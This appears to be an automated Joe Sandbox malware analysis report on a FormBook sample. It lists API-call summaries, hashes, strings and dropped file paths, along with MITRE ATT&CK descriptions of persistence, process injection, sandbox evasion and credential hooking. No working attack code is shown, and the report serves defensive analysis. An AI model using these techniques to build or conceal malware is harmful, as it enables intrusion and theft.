CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 021AA734

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 077ad060dbecf68a869931729b66f6022fe1b8733d6e335e6ed2e27990553ef1
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 9401B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 021A91B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0219F050,?,?,00000000), ref: 021A91EC

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: dfd687a368151b96c951bdfed8c57082f8c90fd7efff9cd705ea1fad239337be
Instruction ID: d15ea77744c3f4331ff381cae47ec1e1376d94210c6f2e0cf6091630b15099a6
Opcode Fuzzy Hash: dfd687a368151b96c951bdfed8c57082f8c90fd7efff9cd705ea1fad239337be
Instruction Fuzzy Hash: 27E06D3B3802043AE22065A9AC02FA7B29C8B91B61F140026FA0DEA2C1DA96F40146E5

Uniqueness

Uniqueness Score: -1.00%

Function 021AA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(021A4536,?,021A4CAF,021A4CAF,?,021A4536,?,?,?,?,?,00000000,00000000,?), ref: 021AA65D

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 509e88caf8de08644f7917bd3c10ec7d8c49013741958ee34c6e3f459e883787
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: F6E012B6200208ABDB18EF99CC40EAB77ADEF88654F118558BA085B241C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 021AA7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0219F1D2,0219F1D2,?,00000000,?,?), ref: 021AA800

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 70ef9be1e09f62716521cbcbb9a0ff213e24a6491d4945acb3d93f116688ab0b
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 82E01AB52002086BDB14DF59CC84EEB37ADEF88650F118154BA0857241CA30E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0219F6C9 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02198D14,?), ref: 0219F6FB

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2574f8edebe7e896112ff0d17bfdb10c2b50bc25d3e07dff3f9e9bb06ff21b86
Instruction ID: 0dffe6feafffd1673bb6f8f490d7f11c5e5020e649834bfb0887991160e36d8f
Opcode Fuzzy Hash: 2574f8edebe7e896112ff0d17bfdb10c2b50bc25d3e07dff3f9e9bb06ff21b86
Instruction Fuzzy Hash: 57D02BD46A834439FB51BA701C42F037E440B11600F194698A488E9083DD48D0054235

Uniqueness

Uniqueness Score: -1.00%

Function 0219F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02198D14,?), ref: 0219F6FB

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 9be4978c4ab368871f02ccd90846ad1e484a1fcddc3f5528a64052d34c0bdb31
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 10D05E756903083AEA10AAA49C12F2632895B44A04F590064F948D62C3EA94F00145A5

Uniqueness

Uniqueness Score: -1.00%

Function 04692B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692B44

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 261f6f762b3c1ab310820cb69fd91179cc3683ebb83951fe1302736cd47e1abd
Instruction ID: 6a7af9ce3e7304bfd26c95ee41338f2cab162563eb4e5e7dc4b633f2db49ff24
Opcode Fuzzy Hash: 261f6f762b3c1ab310820cb69fd91179cc3683ebb83951fe1302736cd47e1abd
Instruction Fuzzy Hash: A1B02B31C024C0C6FF00EF200B08707394077D0304F11C451D2030340E4738D490F132

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 021A6CBB Relevance: 6.3, Strings: 5, Instructions: 84COMMON

Download Yara Rule

Strings

: , xrefs: 021A6DBD, 021A6DC1
: , xrefs: 021A6D89
Host, xrefs: 021A6D82
, xrefs: 021A6DAB, 021A6DAE
Host: , xrefs: 021A6DBA, 021A6DD2, 021A6DC0

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID:
String ID: $: $: $Host$Host:
API String ID: 0-1593100478
Opcode ID: 46fbb59e8048c8ef8a73020c6f50dfb66cbad09ea12026dc58818602753fcb4e
Instruction ID: 43602b14e151f1ac662986d7e24c6b339131d0b5e4884ea2f2c7e3c92b177b45
Opcode Fuzzy Hash: 46fbb59e8048c8ef8a73020c6f50dfb66cbad09ea12026dc58818602753fcb4e
Instruction Fuzzy Hash: 6D212676544284AED701CEA4CC90BEBB77CEF82314F0882AEEC499B186D775A505CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 021A7D83 Relevance: 4.1, Strings: 3, Instructions: 315COMMON

Download Yara Rule

Strings

www., xrefs: 021A7F46, 021A7F49
www., xrefs: 021A7EAE, 021A7F6F, 021A8024, 021A8057, 021A80B4, 021A80DF, 021A813C
=, xrefs: 021A7E7E

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID:
String ID: =$www.$www.
API String ID: 0-3343787489
Opcode ID: c75962fdb10161b431724b02babfd0e8281b4c148beca00741b216530b3a184e
Instruction ID: d5a7042bad7314810c2976252fc01dc0257522c9071571eb62663e5d44f33ebe
Opcode Fuzzy Hash: c75962fdb10161b431724b02babfd0e8281b4c148beca00741b216530b3a184e
Instruction Fuzzy Hash: 71C1F6B6984244AECB24DBB0CC91FEFB77EAF04704F044559E2595B182EB74A648CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 04687550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 046C4460
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 046C454D
CLIENT(ntdll): Processing section info %ws..., xrefs: 046C4592
Execute=1, xrefs: 046C451E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 046C4507
ExecuteOptions, xrefs: 046C44AB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 046C4530

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 894a37f7f262f1e9aab32aa1371a627757994ea5efcf63c06635f902cdfb27dd
Instruction ID: 47a237b38dfad1d18b38ced7f6f7c7e0276b8545f793e6b08b8d24a753de1f0b
Opcode Fuzzy Hash: 894a37f7f262f1e9aab32aa1371a627757994ea5efcf63c06635f902cdfb27dd
Instruction Fuzzy Hash: 1A51F771B002196AEF10BFA4DC99FF973A8EF18705F1405ADE505A7280FB70BE418E65

Uniqueness

Uniqueness Score: -1.00%

Function 04659046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 046590B1
@, xrefs: 04659095

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: ae3a1d7a3cd3e13d72134aa4833d697a494aa014715ea75c0c4ca5ccc9ef433f
Instruction ID: d0ffe21329dcb9bb58bffa856694c7895d924b34b235b391a473bc1be2e1bbd2
Opcode Fuzzy Hash: ae3a1d7a3cd3e13d72134aa4833d697a494aa014715ea75c0c4ca5ccc9ef433f
Instruction Fuzzy Hash: DF811AB1D002699BDB31CF54CC44BEEB7B8AB48714F0045EAE919B7250E770AE85CFA5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MaMsKRmgXZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll

C:\Users\user\AppData\Local\Temp\reinhold.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt\haves.ant

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt\laggin.tel

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt\regneoperatorers.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae\unintriguing.tie

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens\Megapterine.buc

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens\Nitzschia.App

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens\Ovariet.Puf73

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
MaMsKRmgXZ.exe

Function 00403235 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 366
stringcomfileCOMMON

Function 0040523F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 004057A2 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403B94 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 004037F7 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402DC4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00405FFC Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre